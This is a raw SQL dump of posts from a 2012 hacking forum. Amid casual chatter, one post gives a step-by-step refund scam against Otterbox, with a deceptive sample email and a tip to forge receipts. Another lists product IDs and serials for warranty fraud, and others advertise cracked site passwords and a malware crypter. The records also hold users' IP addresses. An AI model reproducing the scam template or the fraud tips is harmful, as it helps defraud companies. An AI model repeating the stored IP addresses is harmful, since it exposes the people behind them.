Policies and More', '0', '1', 't3h jok3r', '1350875829', 'You got saved by Ipods post :) Group Approved. Group will be added soon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '12fca11e8e0353d8d8ed81c77d0f4d67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6045', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '2', 'Apathy', '1350875918', 'When is this done? I really want to know if I made it.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '0e842c6bcfec8a4d9b487aa11e3fc5b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6046', '1046', '0', '43', 'Free PID\'s :D', '0', '222', 'Exposé', '1350875931', 'Microsoft Arc Keyboard P/N: J5D-00001 S/N: 0204400224952 EC 0204400251135 EC 0204400320975 EC 0204400224950 EC 0204400310636 EC Microsoft Sidewinder X6 Keyboard PID: 00905-137-3443232-61938 571545228751301000 Microsoft Comfort Curve Keyboard 2000 PID: 76914-185-5603133-14335 Razer Arctosa Gaming Keyboard Product Code/Model #: RZ03-00260100 Serial: MT1003026H01379 Saitek Eclipse II Backlit Keyboard Product Code/Model #: PK02AU Serial: 7G15306611B Microsoft Arc Mouse P/N: RVF-00001 PID: 00514-545-3653004-21049 PN: X817620-002 S/N: PM1047035101191 Razer Mamba Gaming Mouse P/N: RZ01-00120100-R3U1 S/N: Gaming Mouse : PM1041012100913 Charging Dock : PM1041D12100913 Madcatz Infinity Ward Wired Sniper Mouse M/N: 44300 S/N: FO73400415 Logitech Corded M500 Mouse M/N: M-U0007 P/N: 810-001176 PID: LZ041A3 Logitech Corded LS1 Mouse M/N: M-UAS144 P/N: 810-000622 PID: LZ938AJ Logitech Wireless M215 Mouse M/N: M-R0013 P/N: 810-001550 PID: LZ006AW Razer Imperator Gaming Mouse Product Number : Rz01-00350100-R3u1 Serial Number : PM1047035101191 Logitech MX Revolution Wireless Mouse M/N: M-RBQ124 P/N: 831869-0000 PID: LZ638A9 Explorer Mini Mouse PID: 00516-545-0476765-00145 Sidewinder x8 PID: 00903-163-4444946-74171 Arc Touch Mouse PIDs: 00514-545-0770350-03565 00514-545-1695089-03496 00514-545-1239104-03840 00514-545-1573981-03808 00514-545-0681890-03793 00514-545-1572489-03928 00514-545-1351204-03497 00514-545-1926830-03920 00514-545-0471539-03507 00514-545-0326292-03144 03020-523-0609733-01045 World of Warcraft SteelSeries Cataclysm MMO Gaming Mouse Product Code/Model #: 62100 Serial: 6210000111291027574 Microsoft LifeCam Cinema HD P/N: H5D-00001 PID: 02045-545-1754434-00941 PN: X821404-001 Microsoft LifeCam VX-3000 PID: 78038-171-8422822-97199 Microsoft LifeCam VX-6000 PID: 78040-781-6325174-25233 Microsoft LifeChat LX-3000 PID: 79108-237-3434025-55476 Playstation Eye S/N: 990004612 Logitech USB QuickCam Communicate Webcam PID: LZ510A54667 M/N: V-UAM14A P/N: 861194-0000 Microsoft Presenter 3000 PID: 78041-517-4315323-61888 Toshiba 160GB HDD HP Spare Code: 442171-001 P/N: 440640-001 Xbox 360 Controller PID: 05880-545-1514247-01506 PS3 Dualshock 3 Controller (Not sure if this works!) M/N: CECHZC2U S/N: 0K40090101270 Logitech Wireless S510 Desktop Set P/N: 920-000885 M/N: Y-RAK73 PID: LZ7386mc Type: Keyboard/Mouse Kensington Ci70 Keyboard Mouse COMBO Product Number : K64392US Serial Numbers : A0730A000071 A0915A000100 Microsoft Wireless Laser Desktop 7000 PID: 92463-556-5333966-23786 Microsoft Wireless Entertainment Desktop 7000 PID: 81616-313-1446283-25255 Microsoft Wireless Entertainment Destop 8000 PID: 81615-825-6340215-11984 Microsoft Wireless Laser Desktop 6000 v2.0 PID: 77967-638-2335413-14267 SPEAKERS: Logitech LS11 Speakers PID: CP047 Logitech Speaker System Z323 PID: SN012 Logitech Rechargeable Speaker S715i PID: GG046 Logitech Z323 P/n: 980-000354 M/n: s-00075a PID: sn043 Logitech LS21 PID- SN012 M/n- S-00040 P/n- 880-000117.', '74.76.76.132', '1246514308', '0', '0', '61', '1350876114', '1', '6633edec1eea3cca9d88a889c9c75f4c', '0', '1350876114'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6047', '1046', '6046', '43', 'RE: Free PSD\'s :D', '0', '2', 'Apathy', '1350875973', 'A PSD is a Photoshop file. Did you mean PID? XD', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'cea8b845ecf4a95a8d4a4cd16300d7f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6048', '1046', '6046', '43', 'RE: Free PSD\'s :D', '0', '222', 'Exposé', '1350876063', 'LMAO...im thinking photoshop right now lmao....YOLO', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '0fc9757704b7b89471671c1157783910', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6052', '1045', '6037', '49', 'RE: Group Format?', '0', '61', 'NXK', '1350876505', 'Ill take a look into this and contact jok3r. We should be able to do this.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '27b47dc44cae3851ce15d5293285b841', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6049', '1047', '0', '16', 'Get free Otterbox cases!', '0', '222', 'Exposé', '1350876167', 'You must email Otterbox ( customer.service@otterbox.com ) and tell them you love their cases and you\'ve been a loyal costumer for quite a while but that you\'re disappointed at a recent product you acquired. Here\'s an example of what I wrote: Dear Otterbox, I am a huge fan of your products,I\'ve bought some of your cases for my Kindle,iPad and my previous BlackBerry phones.I\'ve always considered your cases the best in the market and the most reliable too,however,I was recently given one of your BlackBerry Reflex series for the Curve 9300 and while it looked like a really promising case at first,it resulted in a very disappointed experience. The problem is that the phone fell from 2 meters and now the case won\'t attach to the phone,I thought your cases would be built in a better quality since they are designed to resist this kind of impact as I\'ve heard,I was so disappointed that I threw the case to the garbage and then I decided to contact you guys to see if you could sort out this for me. Regards, Mr. Sir A) You must say which case type and for which device B)This way you eliminate the possibility of them asking for a proof of purchase C)Since you threw the case to the garbage,they won\'t ask you to send any pictures of it Pro tip:If you can\'t bypass the picture,try and get an Amazon receipt (use a receipt generator) and give them that. I hope you enjoyed it,happy SE\'ing!~', '74.76.76.132', '1246514308', '0', '0', '222', '1350876183', '1', 'f0f431aed94da6abc3a221479b1bbc7e', '0', '1350876183'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6050', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1350876414', 'Nice group VirtualLegend....hopefully you will get some good members', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '6219de12deb3e249ac427d36de85db3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6051', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '1', 't3h jok3r', '1350876450', 'Then suggest other colors and I will see which one suits. I agree red looks like a warning and too strong.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6414daf97455989d868221032c12e1e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6053', '902', '4937', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '2', 'Apathy', '1350877006', 'Have you made it yet? :P', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'a26b41f8957a280b10a0e682c13723ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6054', '1045', '6037', '49', 'RE: Group Format?', '0', '222', 'Exposé', '1350877595', 'Ok sweet thanks...I think this would be a great addition or upgrade', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'ef9a9a19df76fc29ff65e3e169185078', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6055', '1048', '0', '64', 'Good sports stream!', '0', '61', 'NXK', '1350877760', 'http://88.80.11.29/ I like it, I use it to watch UFC.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '72f63a20df99e3bd76f75ee9dd9dff0e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6056', '1045', '6037', '49', 'RE: Group Format?', '0', '257', 'XxTREYZxX', '1350877951', 'yes i think it would awesome :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'ffd6d439e7c13448863694e9e345d240', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6057', '1049', '0', '49', 'User tagging anyone?', '0', '222', 'Exposé', '1350878377', 'I remember this awesome forum I was on a while ago that allowed members to tag other members in the post they made so for example.. If I wanted to get NXK\'s attention I could be like \"I <3 @NXK\" and it would send him a notification alerting him of that.... I know some of you will be like yeh...people will spam it and shit but you can prob edit settings and shit...and not many people did. What do you guys think?', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'efcda195f92fb2c383aac7dca6d34652', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6058', '1050', '0', '7', 'What do you do to relax?', '0', '205', 'mothered', '1350878540', 'Greetings to all, With all our day to day computational stuff of hacking, cracking, etc, It can get pretty Intense. I know that\'s certainly the case with myself. So what do you guys do to relax and take time out? I try to get around an hour\'s sleep (to ease the mind), and just watch a few YouTube videos, mainly music clips, and anything random to have a laugh over. You guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'eba97f42eb9f2e84ca8450d586ae78ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6059', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '222', 'Exposé', '1350878667', 'Yeh with all my school, work and LH, I mostly just watch Netflix and just watch videos and shit...And play videos games ofc', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '0fc81c3c696c645c5d94ddd54f6afc81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6060', '1051', '0', '58', 'Advertisers Applications', '0', '3', '??????????¢™', '1350880695', 'Thanks for your interest in helping out L33T Hacking getting new members. Please post the answers to the questions you have received through PM below. Jok3r will then PM you your tasks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2d7136c49c8057ec239c88f3b31aa430', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6061', '1052', '0', '65', 'Wrong Turn 5 found it kinda boring', '0', '1', 't3h jok3r', '1350881174', 'I watched Wrong Turn 5 yesterday morning and I found the ending boring, It didn\'t have any ending/climax. Other than that the movie was great. Any other reviews?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd41be1152b57b6276ff2ff2432e74150', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6062', '1049', '6057', '49', 'RE: User tagging anyone?', '0', '1', 't3h jok3r', '1350882012', 'It depends on the forums niche. No one makes announcements on someone else plus from this peoples profiles would get more cached by bots which will bring more results on Google so people can get DOXed more easier. Thanks for the suggestion.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bd04710fd3e91df1c6c40ed6fbbd61f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6063', '1052', '6061', '65', 'RE: Wrong Turn 5 found it kinda boring', '0', '2', 'Apathy', '1350882428', 'Is this a scary movie? I have not watched anything recently.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'a61c545dec834500c7872c6d8a6314b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6064', '1052', '6061', '65', 'RE: Wrong Turn 5 found it kinda boring', '0', '222', 'Exposé', '1350882590', 'Lmao iv\'e seen like all of the wrong turns except this one...I believe like 2 of them have cannibal midget guys in them right lmao? If this is the same series?', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '39a9c4de93ccfc3a02f5b743a3be7485', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6065', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '257', 'XxTREYZxX', '1350889402', 'I just have a sleep for a little bit then jump back on this :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '45435906920d1ce2d826571fa66052eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6066', '1046', '6046', '43', 'RE: Free PID\'s :D', '0', '62', 'R?????zo?', '1350889851', 'This been copy & pasted from my thread. http://l33thacking.net/thread-461.html someone please close.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'da995fa988a0566933ddb96c0f148e46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6067', '1051', '6060', '58', 'RE: Advertisers Applications', '0', '258', 'PiXEL^OG', '1350890066', '1. No i use all three of my email , some for work and other for normal day stuff 2. No i don\'t , they are usually run by skids who think XSS is a computer trick 3. I don\'t have twitter 4. Google 5. No i only have an account to watch videos 6. Facebook only , but none of my friends know i do this 7. Yup ive been on ubers since it was launched , Everyone knows me there im a respected member :) 8. I don\'t have much spare time , sorry but i still love LH <3', '139.190.235.246', '-1950422026', '0', '0', '258', '1350890092', '1', '00baa7c72289c16a7653557a09aedef6', '0', '1350890092'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6068', '1051', '6060', '58', 'RE: Advertisers Applications', '0', '257', 'XxTREYZxX', '1350890909', 'of course i will advertise LH 1.no im very sorry only this one but i can make one 2.no i dont sorry 3.i dont have twiiter 4.dont know what this means 5.yes i do upload video\'s on you Tube. 6.yes i am planet minecraft 7.yes ubers and have been for a while now 8.yes of course i will there you go', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '65ed6c032cc562da27e774947786595e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6069', '1046', '6046', '43', 'RE: Free PID\'s :D', '0', '222', 'Exposé', '1350892661', 'WTF....lol. I grabbed this off Fkn randomly bro. Mah bad....I never even saw ur thread lol.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'dc87b262a3c19197cdace5a24a7618cc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6070', '1053', '0', '54', 'Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 22.OKT.2012', '17', '255', 'sbhshroy2', '1350900766', 'click here http://adf.ly/Dubfk', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '9fac0d7da9224bebbaf9cb5b9fb6756d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6071', '1054', '0', '54', '[22 oct] Tonightsgirlfriend x 5 freshly cracked*No Download*', '17', '255', 'sbhshroy2', '1350900859', 'click here http://adf.ly/DudIS', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '80d2f8139170e50b1a59863c28bc9bf3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6072', '1055', '0', '54', 'rapidshare Premium Account *No Download*', '17', '255', 'sbhshroy2', '1350900941', 'click here http://adf.ly/Ducx4', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '51b9aa74a24080dda675e981bf3d049e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6073', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '62', 'R?????zo?', '1350900972', 'just work work and work, also spend the free time with my girl', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', 'fe268b459bbf890590635dfc8dd73e8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6074', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '62', 'R?????zo?', '1350901080', 'just make it light green, should look cool. also the links on the signatures is still locked too, any way to fix it?', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '113e17a887a6d16b79ffb22fb7227fd8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6075', '945', '5288', '7', 'RE: I dont want.......', '0', '62', 'R?????zo?', '1350901173', 'looks like it\'s fixed with the new plugin though :)', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '2fbab27e82b46b52b10aca4f9984a686', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6076', '1048', '6055', '64', 'RE: Good sports stream!', '0', '62', 'R?????zo?', '1350901356', 'thanks for this, appreciated :)', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '4ed1043505d92509b3aa18c2ae829e81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6077', '1028', '5928', '12', 'RE: [Tutorial] How to create a Fake Prank Wifi Access Point', '0', '62', 'R?????zo?', '1350901559', 'thanks it might come handy to troll friends :P', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '30903809c5b309f40ba7c0e9d10abcc8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6078', '1035', '5983', '20', 'RE: NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '62', 'R?????zo?', '1350901657', '[quote=\'??zg???g????61\' pid=\'5983\' dateline=\'1350861232\'] :O thanks a TON dude! Could you post proof of the %100 FUD? Thanks :D [/quote] I might add it later bro, once I get home :)', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '23dcf8edb7840463e4ba57f1ebc3a42e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6079', '822', '6045', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350901940', '[quote=\'Apathy\' pid=\'6045\' dateline=\'1350875918\'] When is this done? I really want to know if I made it. [/quote] The Download link is already updated in the thread. Everyone can download it now', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4145cc35f805eb6fb6de2b507f128149', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6080', '1055', '6072', '54', 'RE: rapidshare Premium Account *No Download*', '0', '228', 'VirtualLegend', '1350902051', 'Thanks for the share bro!!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e24a3a1a82913200a49b849b02a5e9ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6081', '1036', '5975', '30', 'RE: Mega SEO Pack', '0', '228', 'VirtualLegend', '1350902256', 'Great share i think it\'s the only SEO share on LH', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4ec49367ad6c2266b3e38aa1a5e449d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6082', '1035', '5963', '20', 'RE: NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '228', 'VirtualLegend', '1350902334', 'Looks Legit, Thanks for the share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c54eb71e6654683bfa5f839ad3801f77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6083', '1056', '0', '9', 'make money by shortening websites', '17', '255', 'sbhshroy2', '1350902461', 'earn more than 300$ per month by adf go and sign up free and then write any site such as google.com and u get a short link for this site, copy the short link and past it to facebook, twitter or other social sites and whrn people visit u got money. u get 4.5$ per 1000visit and u get 20% of referrals earning [size=large][url=http://adf.ly/?id=2559700]clcik here for sign up[/url][/size]', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '58b34e26e12be279da81e9dd7cf847aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6084', '1049', '6057', '49', 'RE: User tagging anyone?', '0', '228', 'VirtualLegend', '1350902512', 'Looks very handy for me :p', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'af54c169fd66ac15360024e9bca0ab3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6085', '918', '5088', '65', 'RE: I feel famous', '0', '228', 'VirtualLegend', '1350902619', 'Do you already have adsense on your YT account. And how much did you maked? [hr] Do you have adsense on your YT channel [hr] Do you have adsense on your YT channel [hr] Do you have adsense on your YT channel [hr] Do you have adsense on your YT channel [hr] Lol i found a bug with the new plugin', '83.83.167.183', '1397991351', '1', '0', '228', '1350902691', '1', '7c17ab777e4c6e371ef189f040c0267c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6086', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '62', 'R?????zo?', '1350902672', 'thanks for the feedback guys, Enjoy :)', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', 'd66d481af60534a362a315ea1be8b6a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, 